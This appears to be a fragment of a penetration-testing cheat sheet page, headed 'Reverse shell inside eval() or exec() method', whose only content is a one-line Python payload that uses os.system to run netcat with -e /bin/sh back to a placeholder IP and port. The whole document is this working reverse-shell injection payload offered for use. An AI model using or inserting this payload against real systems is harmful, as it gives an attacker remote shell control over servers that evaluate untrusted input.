Skip to content

Python

Reverse shell inside eval() or exec() method

__import__('os').system('nc your_ip port -e /bin/sh')